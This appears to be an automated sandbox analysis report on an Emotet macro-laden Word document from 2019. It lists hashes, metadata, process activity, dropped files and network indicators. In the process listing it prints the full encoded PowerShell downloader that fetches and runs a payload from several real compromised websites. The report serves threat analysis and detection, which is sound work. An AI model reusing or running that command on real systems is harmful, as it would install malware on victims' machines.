analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7b552940dadba3f8f8011b0ed9d672cac4a94834b4be35713cec144bc2bf2015

Full analysis: https://app.any.run/tasks/03035da8-d230-4c6f-907d-b6174d9b6b26
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 13:40:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Licensed, Subject: ADP, Author: Oma Gleichner, Comments: 1080p, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 08:57:00 2019, Last Saved Time/Date: Mon May 20 08:57:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 62, Security: 0
MD5:

E36B1F21F99BC29C9E703CC1695AA25C

SHA1:

38DC5E95F3A5715F2319CCD7C74470D219F060EB

SHA256:

7B552940DADBA3F8F8011B0ED9D672CAC4A94834B4BE35713CEC144BC2BF2015

SSDEEP:

3072:r077HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qfW22snSs/6+epLrGF:I77HUUUUUUUUUUUUUUUUUUUT52VMW22E

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3076)
    • Creates files in the user directory

      • powershell.exe (PID: 3076)
    • PowerShell script executed

      • powershell.exe (PID: 3076)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3320)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3320)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Licensed
Subject: ADP
Author: Oma Gleichner
Keywords: -
Comments: 1080p
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 07:57:00
ModifyDate: 2019:05:20 07:57:00
Pages: 1
Words: 10
Characters: 62
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Bins - Shields
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 71
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Hamill
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3320"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7b552940dadba3f8f8011b0ed9d672cac4a94834b4be35713cec144bc2bf2015.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3076powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABUADcAXwA2ADQANQAzADMAPQAnAGMAXwA3ADQANQA3ADcAJwA7ACQATgAzADkANQBfAF8ANgA1ACAAPQAgACcAMgA0ACcAOwAkAG4AMAAyADIAXwA0ADEAPQAnAGMAMwA0ADgANgA3ADEAMQAnADsAJABrADgAMwA3AF8AMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgAzADkANQBfAF8ANgA1ACsAJwAuAGUAeABlACcAOwAkAHIANQA4ADEAMAAzAD0AJwBWADEANAA1ADYANwBfACcAOwAkAE0AMgAxADQAMQA4AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAYABUAC4AVwBFAEIAQwBgAEwAYABJAGAARQBuAFQAOwAkAEIAMgA4ADgANgAwADMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AaQBuAHAAcgBpAG4AdABlAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHkAcgBrAHYAbQA0AHYAeQB5AF8AeQBiAGkAZABiAC0ANAAzADcANAA1ADIAMAA3AC8AQABoAHQAdABwADoALwAvAHMAYQBuAHQAdQBhAHIAaQBvAGEAcABhAHIAZQBjAGkAZABhAG0AbwBuAHQAZQBzAGUALgBjAG8AbQAuAGIAcgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADcAagBuADkAcAA3AF8AcQBvAHUANAA5AGIAagBvAGQAeAAtADMAMwA5ADUAMwAvAEAAaAB0AHQAcAA6AC8ALwBzAGUAcgB3AGkAcwBrAG8AbgBzAG8AbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEoARQBzAGYAWQB1AGkAUABNAHYALwBAAGgAdAB0AHAAcwA6AC8ALwBwAHAAZABpAGEAbQBvAG4AZABzAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0ANAA1AHoAdgAwADMANwB1AGMAXwBuAGUAbgB0ADgANQBkAGEAYQBpAC0AMgA4ADIAMAA2ADcALwBAAGgAdAB0AHAAOgAvAC8AYQB3AG8AcgBsAGQAdABvAHUAcgBpAHMAbQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMQBmAGMAagBjADgAXwBtADQAbABuAGoANwBmAGYAbgBnAC0ANwA1ADUAMQAwADAALwAnAC4AUwBQAGwAaQB0ACgAJwBAACcAKQA7ACQAVgAwADYAXwA0AF8ANQA9ACcATgA0ADEAOQA0ADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGsAOQA2ADgAOAAyADYAXwAgAGkAbgAgACQAQgAyADgAOAA2ADAAMwApAHsAdAByAHkAewAkAE0AMgAxADQAMQA4AC4AZABPAHcAbgBsAG8AYQBkAGYASQBMAGUAKAAkAGsAOQA2ADgAOAAyADYAXwAsACAAJABrADgAMwA3AF8AMAApADsAJAB6ADEAMQAwADQAXwA4ADgAPQAnAGIAMwA5ADgAOAA0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAawA4ADMANwBfADAAKQAuAEwARQBOAGcAdABIACAALQBnAGUAIAAyADEAMgA1ADgAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAgACQAawA4ADMANwBfADAAOwAkAGoANAA2ADUANAA5AD0AJwB2ADcAOAA4ADAAMQA5ADgAJwA7AGIAcgBlAGEAawA7ACQAaQAyAF8AOQAzADkAPQAnAEUANQA3ADgAOAA4ADgANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADgAOAAyADgAMQA5AD0AJwBjADgAMgAxADEAMAAzADUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 361
Read events
888
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRED7A.tmp.cvr
MD5:
SHA256:
3076powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U73E0OQ4HKMZITD35O7V.temp
MD5:
SHA256:
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$552940dadba3f8f8011b0ed9d672cac4a94834b4be35713cec144bc2bf2015.docpgc
MD5:C6F8FB8693BD40105F309D0B44C78452
SHA256:92B8DDAF70527B3962A0EC4387C92C04EA258D829D3CF60C02B1B71C195ED0A4
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E1E6ACC.wmfwmf
MD5:02BBC7D518EEE6BA7D6A88446AE37236
SHA256:E30F4B5C13F7504F6A4BD48397C2FFA852D084644FFBF281F82B068E084FB3A7
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:4BF5A50E356FEA8443684DFD8BDDDD55
SHA256:4A89E064F7D3F536E48922AE122F77D103863507B013776598817E44666711EA
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A311078E.wmfwmf
MD5:12749EE7DA290892EEE06700CF24DA98
SHA256:40481E7A1708403333B431446E2801482DF48F5E18925AAB00415A8F42A1CF54
3320WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:17222E7BED955763CB75EBDA153E0074
SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CDBDF637.wmfwmf
MD5:FD4AA3E9073331C95BF889378F69671C
SHA256:59388D1F167727981FD92D5EE729B4B2C8186E1209F6BCD7364AF49F2F53660A
3076powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fc3f.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E404B45D.wmfwmf
MD5:BCDCCEF8DE072414627126839CDD47D0
SHA256:F42DE952A9BF5DD578E5EF914FAA342EC4302DBE485C31A7BDFF7E34BE66F8E7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3076
powershell.exe
GET
404
171.22.26.29:80
http://saminprinter.com/wp-includes/yrkvm4vyy_ybidb-43745207/
GB
xml
345 b
suspicious
3076
powershell.exe
GET
404
192.99.62.163:80
http://santuarioaparecidamontese.com.br/wp-includes/7jn9p7_qou49bjodx-33953/
CA
xml
345 b
suspicious
3076
powershell.exe
GET
404
199.250.205.232:80
http://aworldtourism.com/wp-includes/1fcjc8_m4lnj7ffng-755100/
US
xml
345 b
malicious
3076
powershell.exe
GET
404
54.38.130.145:80
http://serwiskonsol.com/wp-content/JEsfYuiPMv/
FR
xml
345 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3076
powershell.exe
192.99.62.163:80
santuarioaparecidamontese.com.br
OVH SAS
CA
unknown
3076
powershell.exe
171.22.26.29:80
saminprinter.com
GB
suspicious
3076
powershell.exe
54.38.130.145:80
serwiskonsol.com
OVH SAS
FR
unknown
3076
powershell.exe
104.27.179.199:443
ppdiamonds.co
Cloudflare Inc
US
shared
3076
powershell.exe
199.250.205.232:80
aworldtourism.com
US
unknown

DNS requests

Domain
IP
Reputation
saminprinter.com
  • 171.22.26.29
suspicious
santuarioaparecidamontese.com.br
  • 192.99.62.163
suspicious
serwiskonsol.com
  • 54.38.130.145
unknown
ppdiamonds.co
  • 104.27.179.199
  • 104.27.178.199
suspicious
aworldtourism.com
  • 199.250.205.232
malicious

Threats

No threats detected
No debug info